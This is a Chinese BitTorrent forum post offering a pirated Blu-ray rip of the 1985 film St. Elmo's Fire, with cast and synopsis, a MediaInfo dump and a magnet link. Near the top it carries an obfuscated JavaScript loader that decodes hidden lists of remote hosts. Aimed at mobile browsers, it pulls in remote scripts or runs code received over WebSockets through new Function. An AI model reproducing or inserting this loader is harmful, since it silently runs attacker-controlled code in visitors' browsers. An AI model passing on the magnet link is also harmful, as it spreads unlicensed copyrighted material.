七个毕业生[简繁字幕].St.Elmos.Fire.1985.BluRay.1080p.TrueHD.5.1.x265.10bit 9.13GB

版主小s 7天前 71

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 七个毕业生/圣艾尔摩之火/青春一族/青春火花

◎片 名 St. Elmo's Fire

◎年 代 1985

◎产 地 美国

◎类 别 剧情 / 爱情

◎语 言 英语

◎上映日期 1985-06-28

◎豆瓣评分 7.6/10 from 908 users

◎豆瓣链接 https://movie.douban.com/subject/1301530/

◎片 长 110 分钟

◎导 演 乔·舒马赫 Joel Schumacher

◎编 剧 乔·舒马赫 Joel Schumacher

◎主 演 艾米利奥·艾斯特维兹 Emilio Estevez

罗伯·劳 Rob Lowe

安德鲁·麦卡锡 Andrew McCarthy

黛米·摩尔 Demi Moore

贾德·尼尔森 Judd Nelson

艾丽·西蒂 Ally Sheedy

梅尔·温宁汉姆 Mare Winningham

Scott Nemes Scott Nemes

Jeffrey Lampert Jeffrey Lampert

马里奥·马卡多 Mario Machado

Matthew Laurance Matthew Laurance

维普哈布莱 Whip Hubley

吉娜·赫特 Gina Hecht

珍妮·赖特 Jenny Wright

Thom Bierdz Thom Bierdz

乔伊丝·冯派特 Joyce Van Patten

安娜·玛利亚·霍斯福德 Anna Maria Horsford

马丁·鲍尔萨姆 Martin Balsam

安迪·麦克道威尔 Andie MacDowell

Elizabeth Arlen Elizabeth Arlen

David Lain Baker David Lain Baker

Bernadette Birkett Bernadette Birkett

布莱克·克拉克 Blake Clark

◎标 签 青春 | 美国 | 成长 | 美国电影 | 1985 | 毕业 | 爱情 | AndrewMcCarthy

◎简 介

科比(艾米利奥·艾斯特维兹 Emilio Estevez 饰)深陷感情的漩涡无法自拔;比利(罗伯·劳 Rob Lowe 饰)不安定的生活让妻子最终选择了带着孩子离开;凯文(安德鲁·麦卡锡 Andrew McCarthy 饰)苦苦的希望能够得到心上人的垂怜;朱尔斯(黛米·摩尔 Demi Moore 饰)的生活从来都谈不上什么一帆风顺;埃里克(贾德·尼尔森 Judd Nelson 饰)深爱着妻子却总也管不住自己的下半身;莱斯利(艾丽·西蒂 Ally Sheedy 饰)对凯文的深情似乎一无所知;温蒂(梅尔·温宁汉姆 Mare Winningham 饰)早已厌倦了什么都被拿来和优秀的妹妹作比较的生活。

七个走出了校园象牙塔的年轻人,他们所面对的现实世界是否如他们所想象的一样快乐和美好?面对无法回避的人生岔路口,他们会做出怎样的选择?又会谱写出怎样悲欢交织的精彩人生?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 144384774846855238414418792959389440853 (0x6C9F7F02F920B2DE7D866FA0DE4F9B55)

  4. Complete name : [email protected]DQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.13 GiB

  8. Duration : 1 h 48 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 12.1 Mb/s

  11. Encoded date : UTC 2021-10-06 01:54:23

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 48 min

  21. Bit rate : 10.1 Mb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.273

  31. Stream size : 7.61 GiB (83%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 10068 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / total-frames=155664 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : MLP FBA

  46. Format/Info : Meridian Lossless Packing FBA

  47. Commercial name : Dolby TrueHD

  48. Codec ID : A_TRUEHD

  49. Duration : 1 h 48 min

  50. Bit rate mode : Variable

  51. Bit rate : 1 403 kb/s

  52. Maximum bit rate : 2 574 kb/s

  53. Channel(s) : 6 channels

  54. Channel layout : L R C LFE Ls Rs

  55. Sampling rate : 48.0 kHz

  56. Frame rate : 1 200.000 FPS (40 SPF)

  57. Compression mode : Lossless

  58. Stream size : 1.06 GiB (12%)

  59. Title : English Dolby TrueHD 5.1 @ 1403 kbps

  60. Language : English

  61. Default : Yes

  62. Forced : No

  63. Original source medium : Blu-ray


  64. Audio #2

  65. ID : 3

  66. ID in the original source medium : 4352 (0x1100)

  67. Format : AC-3

  68. Format/Info : Audio Coding 3

  69. Commercial name : Dolby Digital

  70. Codec ID : A_AC3

  71. Duration : 1 h 48 min

  72. Bit rate mode : Constant

  73. Bit rate : 448 kb/s

  74. Channel(s) : 6 channels

  75. Channel layout : L R C LFE Ls Rs

  76. Sampling rate : 48.0 kHz

  77. Frame rate : 31.250 FPS (1536 SPF)

  78. Compression mode : Lossy

  79. Stream size : 347 MiB (4%)

  80. Title : English Dolby Digital Audio 5.1 @ 448 kbps

  81. Language : English

  82. Service kind : Complete Main

  83. Default : No

  84. Forced : No

  85. Original source medium : Blu-ray


  86. Text #1

  87. ID : 4

  88. ID in the original source medium : 4608 (0x1200)

  89. Format : PGS

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 43 min

  93. Bit rate : 32.4 kb/s

  94. Count of elements : 2332

  95. Stream size : 23.9 MiB (0%)

  96. Title : Eng/SUP

  97. Language : English

  98. Default : No

  99. Forced : No

  100. Original source medium : Blu-ray


  101. Text #2

  102. ID : 5

  103. ID in the original source medium : 4609 (0x1201)

  104. Format : PGS

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 1 h 44 min

  108. Bit rate : 27.8 kb/s

  109. Count of elements : 2758

  110. Stream size : 20.8 MiB (0%)

  111. Title : Eng/SUP SDH

  112. Language : English

  113. Default : No

  114. Forced : No

  115. Original source medium : Blu-ray


  116. Text #3

  117. ID : 6

  118. Format : PGS

  119. Codec ID : S_HDMV/PGS

  120. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  121. Duration : 1 h 44 min

  122. Bit rate : 19.6 kb/s

  123. Count of elements : 2328

  124. Stream size : 14.6 MiB (0%)

  125. Title : Chs/SUP 简体

  126. Language : Chinese

  127. Default : Yes

  128. Forced : No


  129. Text #4

  130. ID : 7

  131. Format : PGS

  132. Codec ID : S_HDMV/PGS

  133. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  134. Duration : 1 h 44 min

  135. Bit rate : 20.2 kb/s

  136. Count of elements : 2328

  137. Stream size : 15.0 MiB (0%)

  138. Title : Cht/SUP 繁体

  139. Language : Chinese

  140. Default : No

  141. Forced : No


  142. Menu

  143. 00:00:00.000 : en:Chapter 01

  144. 00:10:15.865 : en:Chapter 02

  145. 00:17:14.324 : en:Chapter 03

  146. 00:22:48.200 : en:Chapter 04

  147. 00:31:00.275 : en:Chapter 05

  148. 00:38:09.620 : en:Chapter 06

  149. 00:44:14.735 : en:Chapter 07

  150. 00:52:19.386 : en:Chapter 08

  151. 00:56:32.764 : en:Chapter 09

  152. 01:00:08.104 : en:Chapter 10

  153. 01:06:39.996 : en:Chapter 11

  154. 01:11:02.800 : en:Chapter 12

  155. 01:19:54.539 : en:Chapter 13

  156. 01:30:03.022 : en:Chapter 14

  157. 01:37:13.828 : en:Chapter 15

  158. 01:41:21.700 : en:Chapter 16




复制代码


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:0F85B524C36C6FA314426E83CEF8A91B4EA89EC5
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回